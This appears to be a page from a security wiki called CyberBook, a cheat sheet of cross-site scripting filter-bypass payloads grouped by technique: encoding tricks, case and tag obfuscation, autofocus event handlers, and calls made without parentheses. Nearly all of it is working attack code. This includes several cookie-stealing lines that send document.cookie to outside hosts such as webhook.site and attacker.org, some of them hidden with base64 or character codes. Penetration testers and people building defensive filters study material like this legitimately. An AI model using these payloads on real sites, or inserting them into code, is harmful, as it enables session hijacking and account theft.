📖 CyberBook

Appearance

XSS - Filter Bypass

Keyword

js
\u0061lert(1) // alert(1)

Redirection

js
location.href="//URL"
location="//URL"
document.location="//URL"
window.location.assign("//URL")
window['location']['href']=
document.location.replace()
window.open("link", "_blank");
window['location']['href']="//URL"
js
document.cookie 
document['cookie']
with(document)alert(cookie)
doc\u0075ment.cookie
doc\u0075ment['cookie']
window["doc"+"ument"]["cookie"]

Concat

js
fetch("//webhook.site/?c="+document.cookie)
fetch("//webhook.site/?c=".concat(document.cookie))
fetch("//webhook.site/?c=", document.cookie.join())
fetch(`//webhook.site/?c=${document.cookie}`)
js
// exfiltration bypass
fetch(atob('Ly93ZWJob29rLnNpdGUvVVJMP2Nvb2tpZT0=').concat(document.cookie))
fetch('//attacker.org', { method: 'POST', mode: 'no-cors', body:document.cookie }) // no-cors

Wrapper

js
JaVaScript:alert(1)
ja	vascript:alert(1)
java\tscript:alert(1)
javascript:alert('XSS')

ja
vascript:alert(1) # CRLF

# colon
javascript:alert()
javascript:alert()

Eval call

js
eval.call(undefined, "alert(1)") // call function
eval.call(window, 'alert(1)') // execute in a JS global even code execute in function
(0,eval)('alert(1)') // equivalent

String.fromCharCode()

js
// String.fromCharCode() with charcode (base 10) to bypass

String.fromCharCode(97,108,101,114,116) // charcode base 10

'- eval(String.fromCharCode(97,108,101,114,116))('XSS')//

Case sensitive

html
<sCrIpt>alert(1)</ScRipt>
<sVg/onload=alert(1)>

If developper check is balise name is present with regex for example.

Bypass Tag Blacklist

html
<script x>
<script x>alert('XSS')<script y>

JS Content

js
%27%2Balert(1)%2B%27
^alert(1)//
*alert(1)//
.concat(alert(1))//

DOM Based

html
<scr<script>ipt>alert('XSS')</scr<script>ipt>

<svgonload=alert(1)> # with ff char
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>

<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>

Auto Focus Bypass

html
<button autofocus onfocus=write(atob(&quot;PHNjcmlwdD53aW5kb3cubG9jYXRpb249Jy8vd2ViaG9vay5zaXRlL1VSTD9jb29raWU9Jytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=&quot;))>
<button autofocus onfocus=(eval)(atob(/base64/.source))>
<button autofocus onfocus=[JS FUCK]>
<button autofocus onfocus=eval/**/(alert/**/(atob(/**/"BASE64")))>
<button onfocus=location=textContent+cookie autofocus> http://xxx?cookie= </button>
html
<keygen autofocus onfocus=write(atob(&quot;PHNjcmlwdD50b3AubG9jYXRpb249Jy8vc2VuZC5oZXJlLm1lPycrZG9jdW1lbnQuY29va2llPC9zY3JpcHQ+&quot;))>

<keygen autofocus onfocus=document.write(String.fromCharCode(39,60,105,109,103,32,115,114,99,61,34,104,116,116,112,115,58,47,47,104,116,116,112,114,101,113,46,99,111,109,47,111,100,100,45,108,101,97,102,45,121,100,101,49,102,117,55,112,47,114,101,99,111,114,100,63,99,109,100,61,39)+document.cookie+String.fromCharCode(39,34,119,105,116,100,104,61,48,32,104,105,103,104,116,61,48,32,98,111,114,100,101,114,61,48,32,47,62,39))/>

Chars Filter

Bypass Dot Filter

html
<script>window['alert'](document['domain'])</script>

<!-- Base64 encoding -->
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>

<script nonce="PHNjcmlwdCBubzIxLTQtMjAyNQ==">location=atob("Ly9vcGVuLXRyYWNlLmNvbS9jcmVhdGUtcmVxdWVzdC8wMWpzYm0xaGh5cDF3NHFoZmtuN3luNDkwbj9jb29raWU9")%2Bwindow["doc"%2B"ument"]["cookie"]</script>

Bypass ' " `

js
atob(/base64/.source)

Bypass Parentheses

js
alert`1`
setTimeout`alert\u0028document.domain\u0029`;
document.location="javascript:alert%2845%29"
onerror=alert;throw 45

Parentheses and Semi Colon

html
<script>onerror=alert;throw 1337</script>
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>